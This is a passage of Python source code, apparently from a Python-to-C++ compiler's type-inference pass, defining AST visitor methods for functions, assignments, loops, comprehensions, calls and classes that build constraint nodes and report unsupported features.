elif os.path.isfile(os.path.join(path, name + '.py')) or \
os.path.isfile(os.path.join(path, name, '__init__.py')):
modname = '.'.join(module.name_list + [name])
self.import_module(modname, name, node, False)
else:
error("no identifier '%s' in module '%s'" % (name, node.modname), self.gx, node, mv=getmv())
def analyze_module(self, name, pseud, node, fake):
module = parse_module(name, self.gx, getmv().module, node)
if not fake:
self.imports[pseud] = module
else:
self.fake_imports[pseud] = module
return module
def visitFunction(self, node, parent=None, is_lambda=False, inherited_from=None):
if not getmv().module.builtin and (node.varargs or node.kwargs):
error('argument (un)packing is not supported', self.gx, node, mv=getmv())
if not parent and not is_lambda and node.name in getmv().funcs:
func = getmv().funcs[node.name]
elif isinstance(parent, Class) and not inherited_from and node.name in parent.funcs:
func = parent.funcs[node.name]
else:
func = Function(self.gx, node, parent, inherited_from, mv=getmv())
if inherited_from:
self.set_default_vars(node, func)
if not is_method(func):
if not getmv().module.builtin and not node in getmv().funcnodes and not is_lambda:
error("non-global function '%s'" % node.name, self.gx, node, mv=getmv())
if hasattr(node, 'decorators') and node.decorators:
for dec in node.decorators.nodes:
if isinstance(dec, Name) and dec.name == 'staticmethod':
parent.staticmethods.append(node.name)
elif isinstance(dec, Name) and dec.name == 'property':
parent.properties[node.name] = [node.name, None]
elif is_property_setter(dec):
parent.properties[dec.expr.name][1] = node.name
else:
error("unsupported type of decorator", self.gx, dec, mv=getmv())
if parent:
if not inherited_from and not func.ident in parent.staticmethods and (not func.formals or func.formals[0] != 'self'):
error("formal arguments of method must start with 'self'", self.gx, node, mv=getmv())
if not func.mv.module.builtin and func.ident in ['__new__', '__getattr__', '__setattr__', '__radd__', '__rsub__', '__rmul__', '__rdiv__', '__rtruediv__', '__rfloordiv__', '__rmod__', '__rdivmod__', '__rpow__', '__rlshift__', '__rrshift__', '__rand__', '__rxor__', '__ror__', '__iter__', '__call__', '__enter__', '__exit__', '__del__', '__copy__', '__deepcopy__']:
error("'%s' is not supported" % func.ident, self.gx, node, warning=True, mv=getmv())
if is_lambda:
self.lambdas[node.name] = func
# --- add unpacking statement for tuple formals
func.expand_args = {}
for i, formal in enumerate(func.formals):
if isinstance(formal, tuple):
tmp = self.temp_var((node, i), func)
func.formals[i] = tmp.name
fake_unpack = Assign([self.unpack_rec(formal)], Name(tmp.name))
func.expand_args[tmp.name] = fake_unpack
self.visit(fake_unpack, func)
func.defaults = node.defaults
for formal in func.formals:
var = default_var(self.gx, formal, func)
var.formal_arg = True
# --- flow return expressions together into single node
func.retnode = retnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[retnode] = set()
func.yieldnode = yieldnode = CNode(self.gx, (node, 'yield'), parent=func, mv=getmv())
self.gx.types[yieldnode] = set()
self.visit(node.code, func)
for i, default in enumerate(func.defaults):
if not is_literal(default):
self.defaults[default] = (len(self.defaults), func, i)
self.visit(default, None) # defaults are global
# --- add implicit 'return None' if no return expressions
if not func.returnexpr:
func.fakeret = Return(Name('None'))
self.visit(func.fakeret, func)
# --- register function
if isinstance(parent, Class):
if func.ident not in parent.staticmethods: # XXX use flag
default_var(self.gx, 'self', func)
if func.ident == '__init__' and '__del__' in parent.funcs: # XXX what if no __init__
self.visit(CallFunc(Getattr(Name('self'), '__del__'), []), func)
self.gx.gc_cleanup = True
parent.funcs[func.ident] = func
def unpack_rec(self, formal):
if isinstance(formal, str):
return AssName(formal, 'OP_ASSIGN')
else:
return AssTuple([self.unpack_rec(elem) for elem in formal])
def visitLambda(self, node, func=None):
lambdanr = len(self.lambdas)
name = '__lambda%d__' % lambdanr
fakenode = FunctionNode(None, name, node.argnames, node.defaults, node.flags, None, Return(node.code))
self.visit(fakenode, None, True)
f = self.lambdas[name]
f.lambdanr = lambdanr
self.lambdaname[node] = name
newnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[newnode] = set([(f, 0)])
newnode.copymetoo = True
def visitAnd(self, node, func=None):
self.visit_and_or(node, func)
def visitOr(self, node, func=None):
self.visit_and_or(node, func)
def visit_and_or(self, node, func):
newnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[newnode] = set()
for child in node.getChildNodes():
if node in self.gx.bool_test_only:
self.bool_test_add(child)
self.visit(child, func)
self.add_constraint((inode(self.gx, child), newnode), func)
self.temp_var2(child, newnode, func)
def visitIf(self, node, func=None):
for test, code in node.tests:
if is_isinstance(test):
self.gx.filterstack.append(test.args)
self.bool_test_add(test)
faker = CallFunc(Name('bool'), [test])
self.visit(faker, func)
self.visit(code, func)
if is_isinstance(test):
self.gx.filterstack.pop()
if node.else_:
self.visit(node.else_, func)
def visitIfExp(self, node, func=None):
newnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[newnode] = set()
for child in node.getChildNodes():
self.visit(child, func)
self.add_constraint((inode(self.gx, node.then), newnode), func)
self.add_constraint((inode(self.gx, node.else_), newnode), func)
def visitGlobal(self, node, func=None):
func.globals += node.names
def visitList(self, node, func=None):
self.constructor(node, 'list', func)
def visitDict(self, node, func=None):
self.constructor(node, 'dict', func)
if node.items: # XXX library bug
node.lineno = node.items[0][0].lineno
def visitNot(self, node, func=None):
self.bool_test_add(node.expr)
newnode = CNode(self.gx, node, parent=func, mv=getmv())
newnode.copymetoo = True
self.gx.types[newnode] = set([(def_class(self.gx, 'bool_'), 0)]) # XXX new type?
self.visit(node.expr, func)
def visitBackquote(self, node, func=None):
self.fake_func(node, node.expr, '__repr__', [], func)
def visitTuple(self, node, func=None):
if len(node.nodes) == 2:
self.constructor(node, 'tuple2', func)
else:
self.constructor(node, 'tuple', func)
def visitSubscript(self, node, func=None): # XXX merge __setitem__, __getitem__
if len(node.subs) > 1:
subscript = Tuple(node.subs)
else:
subscript = node.subs[0]
if isinstance(subscript, Ellipsis): # XXX also check at setitem
error('ellipsis is not supported', self.gx, node, mv=getmv())
if isinstance(subscript, Sliceobj):
self.slice(node, node.expr, subscript.nodes, func)
else:
if node.flags == 'OP_DELETE':
self.fake_func(node, node.expr, '__delitem__', [subscript], func)
elif len(node.subs) > 1:
self.fake_func(node, node.expr, '__getitem__', [subscript], func)
else:
ident = '__getitem__'
self.fake_func(node, node.expr, ident, [subscript], func)
def visitSlice(self, node, func=None):
self.slice(node, node.expr, [node.lower, node.upper, None], func)
def slice(self, node, expr, nodes, func, replace=None):
nodes2 = slice_nums(nodes)
if replace:
self.fake_func(node, expr, '__setslice__', nodes2 + [replace], func)
elif node.flags == 'OP_DELETE':
self.fake_func(node, expr, '__delete__', nodes2, func)
else:
self.fake_func(node, expr, '__slice__', nodes2, func)
def visitUnarySub(self, node, func=None):
self.fake_func(node, node.expr, '__neg__', [], func)
def visitUnaryAdd(self, node, func=None):
self.fake_func(node, node.expr, '__pos__', [], func)
def visitCompare(self, node, func=None):
newnode = CNode(self.gx, node, parent=func, mv=getmv())
newnode.copymetoo = True
self.gx.types[newnode] = set([(def_class(self.gx, 'bool_'), 0)]) # XXX new type?
self.visit(node.expr, func)
msgs = {'<': 'lt', '>': 'gt', 'in': 'contains', 'not in': 'contains', '!=': 'ne', '==': 'eq', '<=': 'le', '>=': 'ge'}
left = node.expr
for op, right in node.ops:
self.visit(right, func)
msg = msgs.get(op)
if msg == 'contains':
self.fake_func(node, right, '__' + msg + '__', [left], func)
elif msg in ('lt', 'gt', 'le', 'ge'):
fakefunc = CallFunc(Name('__%s' % msg), [left, right])
fakefunc.lineno = left.lineno
self.visit(fakefunc, func)
elif msg:
self.fake_func(node, left, '__' + msg + '__', [right], func)
left = right
# tempvars, e.g. (t1=fun())
for term in node.ops[:-1]:
if not isinstance(term[1], (Name, Const)):
self.temp_var2(term[1], inode(self.gx, term[1]), func)
def visitBitand(self, node, func=None):
self.visitBitpair(node, aug_msg(node, 'and'), func)
def visitBitor(self, node, func=None):
self.visitBitpair(node, aug_msg(node, 'or'), func)
def visitBitxor(self, node, func=None):
self.visitBitpair(node, aug_msg(node, 'xor'), func)
def visitBitpair(self, node, msg, func=None):
CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[inode(self.gx, node)] = set()
left = node.nodes[0]
for i, right in enumerate(node.nodes[1:]):
faker = self.fake_func((left, i), left, msg, [right], func)
left = faker
self.add_constraint((inode(self.gx, faker), inode(self.gx, node)), func)
def visitAdd(self, node, func=None):
self.fake_func(node, node.left, aug_msg(node, 'add'), [node.right], func)
def visitInvert(self, node, func=None):
self.fake_func(node, node.expr, '__invert__', [], func)
def visitRightShift(self, node, func=None):
self.fake_func(node, node.left, aug_msg(node, 'rshift'), [node.right], func)
def visitLeftShift(self, node, func=None):
self.fake_func(node, node.left, aug_msg(node, 'lshift'), [node.right], func)
def visitAugAssign(self, node, func=None): # a[b] += c -> a[b] = a[b]+c, using tempvars to handle sidefx
newnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[newnode] = set()
clone = copy.deepcopy(node)
lnode = node.node
if isinstance(node.node, Name):
blah = AssName(clone.node.name, 'OP_ASSIGN')
elif isinstance(node.node, Getattr):
blah = AssAttr(clone.node.expr, clone.node.attrname, 'OP_ASSIGN')
elif isinstance(node.node, Subscript):
t1 = self.temp_var(node.node.expr, func)
a1 = Assign([AssName(t1.name, 'OP_ASSIGN')], node.node.expr)
self.visit(a1, func)
self.add_constraint((inode(self.gx, node.node.expr), inode(self.gx, t1)), func)
if len(node.node.subs) > 1:
subs = Tuple(node.node.subs)
else:
subs = node.node.subs[0]
t2 = self.temp_var(subs, func)
a2 = Assign([AssName(t2.name, 'OP_ASSIGN')], subs)
self.visit(a1, func)
self.visit(a2, func)
self.add_constraint((inode(self.gx, subs), inode(self.gx, t2)), func)
inode(self.gx, node).temp1 = t1.name
inode(self.gx, node).temp2 = t2.name
inode(self.gx, node).subs = subs
blah = Subscript(Name(t1.name), 'OP_APPLY', [Name(t2.name)])
lnode = Subscript(Name(t1.name), 'OP_APPLY', [Name(t2.name)])
else:
error('unsupported type of assignment', self.gx, node, mv=getmv())
if node.op == '-=':
blah2 = Sub((lnode, node.expr))
if node.op == '+=':
blah2 = Add((lnode, node.expr))
if node.op == '|=':
blah2 = Bitor((lnode, node.expr))
if node.op == '&=':
blah2 = Bitand((lnode, node.expr))
if node.op == '^=':
blah2 = Bitxor((lnode, node.expr))
if node.op == '**=':
blah2 = Power((lnode, node.expr))
if node.op == '<<=':
blah2 = LeftShift((lnode, node.expr))
if node.op == '>>=':
blah2 = RightShift((lnode, node.expr))
if node.op == '%=':
blah2 = Mod((lnode, node.expr))
if node.op == '*=':
blah2 = Mul((lnode, node.expr))
if node.op == '/=':
blah2 = Div((lnode, node.expr))
if node.op == '//=':
blah2 = FloorDiv((lnode, node.expr))
blah2.augment = True
assign = Assign([blah], blah2)
register_node(assign, func)
inode(self.gx, node).assignhop = assign
self.visit(assign, func)
def visitSub(self, node, func=None):
self.fake_func(node, node.left, aug_msg(node, 'sub'), [node.right], func)
def visitMul(self, node, func=None):
self.fake_func(node, node.left, aug_msg(node, 'mul'), [node.right], func)
def visitDiv(self, node, func=None):
self.fake_func(node, node.left, aug_msg(node, 'div'), [node.right], func)
def visitFloorDiv(self, node, func=None):
self.fake_func(node, node.left, aug_msg(node, 'floordiv'), [node.right], func)
def visitPower(self, node, func=None):
self.fake_func(node, node.left, '__pow__', [node.right], func)
def visitMod(self, node, func=None):
if isinstance(node.right, (Tuple, Dict)):
self.fake_func(node, node.left, '__mod__', [], func)
for child in node.right.getChildNodes():
self.visit(child, func)
if isinstance(node.right, Tuple):
self.fake_func(inode(self.gx, child), child, '__str__', [], func)
else:
self.fake_func(node, node.left, '__mod__', [node.right], func)
def visitPrintnl(self, node, func=None):
self.visitPrint(node, func)
def visitPrint(self, node, func=None):
pnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[pnode] = set()
for child in node.getChildNodes():
self.visit(child, func)
self.fake_func(inode(self.gx, child), child, '__str__', [], func)
def temp_var(self, node, func=None, looper=None, wopper=None, exc_name=False):
if node in self.gx.parent_nodes:
varname = self.tempcount[self.gx.parent_nodes[node]]
elif node in self.tempcount: # XXX investigate why this happens
varname = self.tempcount[node]
else:
varname = '__' + str(len(self.tempcount))
var = default_var(self.gx, varname, func, mv=getmv(), exc_name=exc_name)
var.looper = looper
var.wopper = wopper
self.tempcount[node] = varname
register_temp_var(var, func)
return var
def temp_var2(self, node, source, func):
tvar = self.temp_var(node, func)
self.add_constraint((source, inode(self.gx, tvar)), func)
return tvar
def temp_var_int(self, node, func):
var = self.temp_var(node, func)
self.gx.types[inode(self.gx, var)] = set([(def_class(self.gx, 'int_'), 0)])
inode(self.gx, var).copymetoo = True
return var
def visitRaise(self, node, func=None):
if node.expr1 is None or node.expr2 is not None or node.expr3 is not None:
error('unsupported raise syntax', self.gx, node, mv=getmv())
for child in node.getChildNodes():
self.visit(child, func)
def visitTryExcept(self, node, func=None):
self.visit(node.body, func)
for handler in node.handlers:
if not handler[0]:
continue
if isinstance(handler[0], Tuple):
pairs = [(n, handler[1]) for n in handler[0].nodes]
else:
pairs = [(handler[0], handler[1])]
for (h0, h1) in pairs:
if isinstance(h0, Name) and h0.name in ['int', 'float', 'str', 'class']:
continue # handle in lookup_class
cl = lookup_class(h0, getmv())
if not cl:
error("unknown or unsupported exception type", self.gx, h0, mv=getmv())
if isinstance(h1, AssName):
var = self.default_var(h1.name, func, exc_name=True)
else:
var = self.temp_var(h0, func, exc_name=True)
var.invisible = True
inode(self.gx, var).copymetoo = True
self.gx.types[inode(self.gx, var)] = set([(cl, 1)])
for handler in node.handlers:
self.visit(handler[2], func)
# else
if node.else_:
self.visit(node.else_, func)
self.temp_var_int(node.else_, func)
def visitTryFinally(self, node, func=None):
error("'try..finally' is not supported", self.gx, node, mv=getmv())
def visitYield(self, node, func):
func.isGenerator = True
func.yieldNodes.append(node)
self.visit(Return(CallFunc(Name('__iter'), [node.value])), func)
self.add_constraint((inode(self.gx, node.value), func.yieldnode), func)
def visitFor(self, node, func=None):
# --- iterable contents -> assign node
assnode = CNode(self.gx, node.assign, parent=func, mv=getmv())
self.gx.types[assnode] = set()
get_iter = CallFunc(Getattr(node.list, '__iter__'), [])
fakefunc = CallFunc(Getattr(get_iter, 'next'), [])
self.visit(fakefunc, func)
self.add_constraint((inode(self.gx, fakefunc), assnode), func)
# --- assign node -> variables XXX merge into assign_pair
if isinstance(node.assign, AssName):
# for x in..
lvar = self.default_var(node.assign.name, func)
self.add_constraint((assnode, inode(self.gx, lvar)), func)
elif isinstance(node.assign, AssAttr): # XXX experimental :)
# for expr.x in..
CNode(self.gx, node.assign, parent=func, mv=getmv())
self.gx.assign_target[node.assign.expr] = node.assign.expr # XXX multiple targets possible please
fakefunc2 = CallFunc(Getattr(node.assign.expr, '__setattr__'), [Const(node.assign.attrname), fakefunc])
self.visit(fakefunc2, func)
elif isinstance(node.assign, (AssTuple, AssList)):
# for (a,b, ..) in..
self.tuple_flow(node.assign, node.assign, func)
else:
error('unsupported type of assignment', self.gx, node, mv=getmv())
self.do_for(node, assnode, get_iter, func)
# --- for-else
if node.else_:
self.temp_var_int(node.else_, func)
self.visit(node.else_, func)
# --- loop body
self.gx.loopstack.append(node)
self.visit(node.body, func)
self.gx.loopstack.pop()
self.for_in_iters.append(node.list)
def do_for(self, node, assnode, get_iter, func):
# --- for i in range(..) XXX i should not be modified.. use tempcounter; two bounds
if is_fastfor(node):
self.temp_var2(node.assign, assnode, func)
self.temp_var2(node.list, inode(self.gx, node.list.args[0]), func)
if len(node.list.args) == 3 and not isinstance(node.list.args[2], Name) and not is_literal(node.list.args[2]): # XXX merge with ListComp
for arg in node.list.args:
if not isinstance(arg, Name) and not is_literal(arg): # XXX create func for better check
self.temp_var2(arg, inode(self.gx, arg), func)
# --- temp vars for list, iter etc.
else:
self.temp_var2(node, inode(self.gx, node.list), func)
self.temp_var2((node, 1), inode(self.gx, get_iter), func)
self.temp_var_int(node.list, func)
if is_enum(node) or is_zip2(node):
self.temp_var2((node, 2), inode(self.gx, node.list.args[0]), func)
if is_zip2(node):
self.temp_var2((node, 3), inode(self.gx, node.list.args[1]), func)
self.temp_var_int((node, 4), func)
self.temp_var((node, 5), func, looper=node.list)
if isinstance(node.list, CallFunc) and isinstance(node.list.node, Getattr):
self.temp_var((node, 6), func, wopper=node.list.node.expr)
self.temp_var2((node, 7), inode(self.gx, node.list.node.expr), func)
def bool_test_add(self, node):
if isinstance(node, (And, Or, Not)):
self.gx.bool_test_only.add(node)
def visitWhile(self, node, func=None):
self.gx.loopstack.append(node)
self.bool_test_add(node.test)
for child in node.getChildNodes():
self.visit(child, func)
self.gx.loopstack.pop()
if node.else_:
self.temp_var_int(node.else_, func)
self.visit(node.else_, func)
def visitWith(self, node, func=None):
if node.vars:
varnode = CNode(self.gx, node.vars, parent=func, mv=getmv())
self.gx.types[varnode] = set()
self.visit(node.expr, func)
self.add_constraint((inode(self.gx, node.expr), varnode), func)
lvar = self.default_var(node.vars.name, func)
self.add_constraint((varnode, inode(self.gx, lvar)), func)
else:
self.visit(node.expr, func)
for child in node.getChildNodes():
self.visit(child, func)
def visitListCompIf(self, node, func=None):
self.bool_test_add(node.test)
for child in node.getChildNodes():
self.visit(child, func)
def visitListComp(self, node, func=None):
# --- [expr for iter in list for .. if cond ..]
lcfunc = Function(self.gx, mv=getmv())
lcfunc.listcomp = True
lcfunc.ident = 'l.c.' # XXX
lcfunc.parent = func
for qual in node.quals:
# iter
assnode = CNode(self.gx, qual.assign, parent=func, mv=getmv())
self.gx.types[assnode] = set()
# list.unit->iter
get_iter = CallFunc(Getattr(qual.list, '__iter__'), [])
fakefunc = CallFunc(Getattr(get_iter, 'next'), [])
self.visit(fakefunc, lcfunc)
self.add_constraint((inode(self.gx, fakefunc), inode(self.gx, qual.assign)), lcfunc)
if isinstance(qual.assign, AssName): # XXX merge with visitFor
lvar = default_var(self.gx, qual.assign.name, lcfunc) # XXX str or Name?
self.add_constraint((inode(self.gx, qual.assign), inode(self.gx, lvar)), lcfunc)
else: # AssTuple, AssList
self.tuple_flow(qual.assign, qual.assign, lcfunc)
self.do_for(qual, assnode, get_iter, lcfunc)
# cond
for child in qual.ifs:
self.visit(child, lcfunc)
self.for_in_iters.append(qual.list)
# node type
if node in self.gx.genexp_to_lc.values(): # converted generator expression
self.instance(node, def_class(self.gx, '__iter'), func)
else:
self.instance(node, def_class(self.gx, 'list'), func)
# expr->instance.unit
self.visit(node.expr, lcfunc)
self.add_dynamic_constraint(node, node.expr, 'unit', lcfunc)
lcfunc.ident = 'list_comp_' + str(len(self.listcomps))
self.listcomps.append((node, lcfunc, func))
def visitReturn(self, node, func):
self.visit(node.value, func)
func.returnexpr.append(node.value)
if not (isinstance(node.value, Const) and node.value.value is None):
newnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[newnode] = set()
if isinstance(node.value, Name):
func.retvars.append(node.value.name)
if func.retnode:
self.add_constraint((inode(self.gx, node.value), func.retnode), func)
def visitAssign(self, node, func=None):
# --- rewrite for struct.unpack XXX rewrite callfunc as tuple
if len(node.nodes) == 1:
lvalue, rvalue = node.nodes[0], node.expr
if self.struct_unpack(rvalue, func) and isinstance(lvalue, (AssList, AssTuple)) and not [n for n in lvalue.nodes if isinstance(n, (AssList, AssTuple))]:
self.visit(node.expr, func)
sinfo = self.struct_info(rvalue.args[0], func)
faketuple = self.struct_faketuple(sinfo)
self.visit(Assign(node.nodes, faketuple), func)
tvar = self.temp_var2(rvalue.args[1], inode(self.gx, rvalue.args[1]), func)
tvar_pos = self.temp_var_int(rvalue.args[0], func)
self.gx.struct_unpack[node] = (sinfo, tvar.name, tvar_pos.name)
return
newnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[newnode] = set()
# --- a,b,.. = c,(d,e),.. = .. = expr
for target_expr in node.nodes:
pairs = assign_rec(target_expr, node.expr)
for (lvalue, rvalue) in pairs:
# expr[expr] = expr
if isinstance(lvalue, Subscript) and not isinstance(lvalue.subs[0], Sliceobj):
self.assign_pair(lvalue, rvalue, func) # XXX use here generally, and in tuple_flow
# expr.attr = expr
elif isinstance(lvalue, AssAttr):
self.assign_pair(lvalue, rvalue, func)
# name = expr
elif isinstance(lvalue, AssName):
if (rvalue, 0, 0) not in self.gx.cnode: # XXX generalize
self.visit(rvalue, func)
self.visit(lvalue, func)
lvar = self.default_var(lvalue.name, func)
if isinstance(rvalue, Const):
lvar.const_assign.append(rvalue)
self.add_constraint((inode(self.gx, rvalue), inode(self.gx, lvar)), func)
# (a,(b,c), ..) = expr
elif isinstance(lvalue, (AssTuple, AssList)):
self.visit(rvalue, func)
self.tuple_flow(lvalue, rvalue, func)
# expr[a:b] = expr # XXX bla()[1:3] = [1]
elif isinstance(lvalue, Slice):
self.slice(lvalue, lvalue.expr, [lvalue.lower, lvalue.upper, None], func, rvalue)
# expr[a:b:c] = expr
elif isinstance(lvalue, Subscript) and isinstance(lvalue.subs[0], Sliceobj):
self.slice(lvalue, lvalue.expr, lvalue.subs[0].nodes, func, rvalue)
# temp vars
if len(node.nodes) > 1 or isinstance(node.expr, Tuple):
if isinstance(node.expr, Tuple):
if [n for n in node.nodes if isinstance(n, AssTuple)]:
for child in node.expr.nodes:
if (child, 0, 0) not in self.gx.cnode: # (a,b) = (1,2): (1,2) never visited
continue
if not isinstance(child, Const) and not (isinstance(child, Name) and child.name == 'None'):
self.temp_var2(child, inode(self.gx, child), func)
elif not isinstance(node.expr, Const) and not (isinstance(node.expr, Name) and node.expr.name == 'None'):
self.temp_var2(node.expr, inode(self.gx, node.expr), func)
def assign_pair(self, lvalue, rvalue, func):
# expr[expr] = expr
if isinstance(lvalue, Subscript) and not isinstance(lvalue.subs[0], Sliceobj):
if len(lvalue.subs) > 1:
subscript = Tuple(lvalue.subs)
else:
subscript = lvalue.subs[0]
fakefunc = CallFunc(Getattr(lvalue.expr, '__setitem__'), [subscript, rvalue])
self.visit(fakefunc, func)
inode(self.gx, lvalue.expr).fakefunc = fakefunc
if len(lvalue.subs) > 1:
inode(self.gx, lvalue.expr).faketuple = subscript
if not isinstance(lvalue.expr, Name):
self.temp_var2(lvalue.expr, inode(self.gx, lvalue.expr), func)
# expr.attr = expr
elif isinstance(lvalue, AssAttr):
CNode(self.gx, lvalue, parent=func, mv=getmv())
self.gx.assign_target[rvalue] = lvalue.expr
fakefunc = CallFunc(Getattr(lvalue.expr, '__setattr__'), [Const(lvalue.attrname), rvalue])
self.visit(fakefunc, func)
def default_var(self, name, func, exc_name=False):
if isinstance(func, Function) and name in func.globals:
return default_var(self.gx, name, None, mv=getmv(), exc_name=exc_name)
else:
return default_var(self.gx, name, func, mv=getmv(), exc_name=exc_name)
def tuple_flow(self, lvalue, rvalue, func=None):
self.temp_var2(lvalue, inode(self.gx, rvalue), func)
if isinstance(lvalue, (AssTuple, AssList)):
lvalue = lvalue.nodes
for (i, item) in enumerate(lvalue):
fakenode = CNode(self.gx, (item,), parent=func, mv=getmv()) # fake node per item, for multiple callfunc triggers
self.gx.types[fakenode] = set()
self.add_constraint((inode(self.gx, rvalue), fakenode), func)
fakefunc = CallFunc(FakeGetattr3(rvalue, '__getitem__'), [Const(i)])
fakenode.callfuncs.append(fakefunc)
self.visit(fakefunc, func)
self.gx.item_rvalue[item] = rvalue
if isinstance(item, AssName):
lvar = self.default_var(item.name, func)
self.add_constraint((inode(self.gx, fakefunc), inode(self.gx, lvar)), func)
elif isinstance(item, (Subscript, AssAttr)):
self.assign_pair(item, fakefunc, func)
elif isinstance(item, (AssTuple, AssList)): # recursion
self.tuple_flow(item, fakefunc, func)
else:
error('unsupported type of assignment', self.gx, item, mv=getmv())
def super_call(self, orig, parent):
node = orig.node
while isinstance(parent, Function):
parent = parent.parent
if (isinstance(node.expr, CallFunc) and
node.attrname not in ('__getattr__', '__setattr__') and
isinstance(node.expr.node, Name) and
node.expr.node.name == 'super'):
if (len(node.expr.args) >= 2 and
isinstance(node.expr.args[1], Name) and node.expr.args[1].name == 'self'):
cl = lookup_class(node.expr.args[0], getmv())
if cl.node.bases:
return cl.node.bases[0]
error("unsupported usage of 'super'", self.gx, orig, mv=getmv())
def visitCallFunc(self, node, func=None): # XXX clean up!!
newnode = CNode(self.gx, node, parent=func, mv=getmv())
if isinstance(node.node, Getattr): # XXX import math; math.e
# rewrite super(..) call
base = self.super_call(node, func)
if base:
node.node = Getattr(copy.deepcopy(base), node.node.attrname)
node.args = [Name('self')] + node.args
# method call
if isinstance(node.node, FakeGetattr): # XXX butt ugly
self.visit(node.node, func)
elif isinstance(node.node, FakeGetattr2):
self.gx.types[newnode] = set() # XXX move above
self.callfuncs.append((node, func))
for arg in node.args:
inode(self.gx, arg).callfuncs.append(node) # this one too
return
elif isinstance(node.node, FakeGetattr3):
pass
else:
self.visitGetattr(node.node, func, callfunc=True)
inode(self.gx, node.node).callfuncs.append(node) # XXX iterative dataflow analysis: move there?
inode(self.gx, node.node).fakert = True
ident = node.node.attrname
inode(self.gx, node.node.expr).callfuncs.append(node) # XXX iterative dataflow analysis: move there?
if isinstance(node.node.expr, Name) and node.node.expr.name in getmv().imports and node.node.attrname == '__getattr__': # XXX analyze_callfunc
if node.args[0].value in getmv().imports[node.node.expr.name].mv.globals: # XXX bleh
self.add_constraint((inode(self.gx, getmv().imports[node.node.expr.name].mv.globals[node.args[0].value]), newnode), func)
elif isinstance(node.node, Name):
# direct call
ident = node.node.name
if ident == 'print':
ident = node.node.name = '__print' # XXX
if ident in ['hasattr', 'getattr', 'setattr', 'slice', 'type', 'Ellipsis']:
error("'%s' function is not supported" % ident, self.gx, node.node, mv=getmv())
if ident == 'dict' and [x for x in node.args if isinstance(x, Keyword)]:
error('unsupported method of initializing dictionaries', self.gx, node, mv=getmv())
if ident == 'isinstance':
error("'isinstance' is not supported; always returns True", self.gx, node, mv=getmv(), warning=True)
if lookup_var(ident, func, mv=getmv()):
self.visit(node.node, func)
inode(self.gx, node.node).callfuncs.append(node) # XXX iterative dataflow analysis: move there
else:
self.visit(node.node, func)
inode(self.gx, node.node).callfuncs.append(node) # XXX iterative dataflow analysis: move there
# --- arguments
if not getmv().module.builtin and (node.star_args or node.dstar_args):
error('argument (un)packing is not supported', self.gx, node, mv=getmv())
args = node.args[:]
if node.star_args:
args.append(node.star_args) # partially allowed in builtins
if node.dstar_args:
args.append(node.dstar_args)
for arg in args:
if isinstance(arg, Keyword):
arg = arg.expr
self.visit(arg, func)
inode(self.gx, arg).callfuncs.append(node) # this one too
# --- handle instantiation or call
constructor = lookup_class(node.node, getmv())
if constructor and (not isinstance(node.node, Name) or not lookup_var(node.node.name, func, mv=getmv())):
self.instance(node, constructor, func)
inode(self.gx, node).callfuncs.append(node) # XXX see above, investigate
else:
self.gx.types[newnode] = set()
self.callfuncs.append((node, func))
def visitClass(self, node, parent=None):
if not getmv().module.builtin and not node in getmv().classnodes:
error("non-global class '%s'" % node.name, self.gx, node, mv=getmv())
if len(node.bases) > 1:
error('multiple inheritance is not supported', self.gx, node, mv=getmv())
if not getmv().module.builtin:
for base in node.bases:
if not isinstance(base, (Name, Getattr)):
error("invalid expression for base class", self.gx, node, mv=getmv())
if isinstance(base, Name):
name = base.name
else:
name = base.attrname
cl = lookup_class(base, getmv())
if not cl:
error("no such class: '%s'" % name, self.gx, node, mv=getmv())
elif cl.mv.module.builtin and name not in ['object', 'Exception', 'tzinfo']:
if def_class(self.gx, 'Exception') not in cl.ancestors():
error("inheritance from builtin class '%s' is not supported" % name, self.gx, node, mv=getmv())
if node.name in getmv().classes:
newclass = getmv().classes[node.name] # set in visitModule, for forward references
else:
check_redef(self.gx, node) # XXX merge with visitModule
newclass = Class(self.gx, node, getmv())
self.classes[node.name] = newclass
getmv().classes[node.name] = newclass
newclass.module = self.module
newclass.parent = StaticClass(newclass, getmv())
# --- built-in functions
for cl in [newclass, newclass.parent]:
for ident in ['__setattr__', '__getattr__']:
func = Function(self.gx, mv=getmv())
func.ident = ident
func.parent = cl
if ident == '__setattr__':
func.formals = ['name', 'whatsit']
retexpr = Return(Name('None'))
self.visit(retexpr, func)
elif ident == '__getattr__':
func.formals = ['name']
cl.funcs[ident] = func
# --- built-in attributes
if 'class_' in getmv().classes or 'class_' in getmv().ext_classes:
var = default_var(self.gx, '__class__', newclass)
var.invisible = True
self.gx.types[inode(self.gx, var)] = set([(def_class(self.gx, 'class_'), def_class(self.gx, 'class_').dcpa)])
def_class(self.gx, 'class_').dcpa += 1
# --- staticmethod, property
skip = []
for child in node.code.getChildNodes():
if isinstance(child, Assign) and len(child.nodes) == 1:
lvalue, rvalue = child.nodes[0], child.expr
if isinstance(lvalue, AssName) and isinstance(rvalue, CallFunc) and isinstance(rvalue.node, Name) and rvalue.node.name in ['staticmethod', 'property']:
if rvalue.node.name == 'property':
if len(rvalue.args) == 1 and isinstance(rvalue.args[0], Name):
newclass.properties[lvalue.name] = rvalue.args[0].name, None
elif len(rvalue.args) == 2 and isinstance(rvalue.args[0], Name) and isinstance(rvalue.args[1], Name):
newclass.properties[lvalue.name] = rvalue.args[0].name, rvalue.args[1].name
else:
error("complex properties are not supported", self.gx, rvalue, mv=getmv())
else:
newclass.staticmethods.append(lvalue.name)
skip.append(child)
# --- children
for child in node.code.getChildNodes():
if child not in skip:
cl = self.classes[node.name]
if isinstance(child, FunctionNode):
self.visit(child, cl)
else:
cl.parent.static_nodes.append(child)
self.visit(child, cl.parent)
# --- __iadd__ etc.
if not newclass.mv.module.builtin or newclass.ident in ['int_', 'float_', 'str_', 'tuple', 'complex']:
msgs = ['add', 'mul'] # XXX mod, pow
if newclass.ident in ['int_', 'float_']:
msgs += ['sub', 'div', 'floordiv']
if newclass.ident in ['int_']:
msgs += ['lshift', 'rshift', 'and', 'xor', 'or']
for msg in msgs:
if not '__i' + msg + '__' in newclass.funcs:
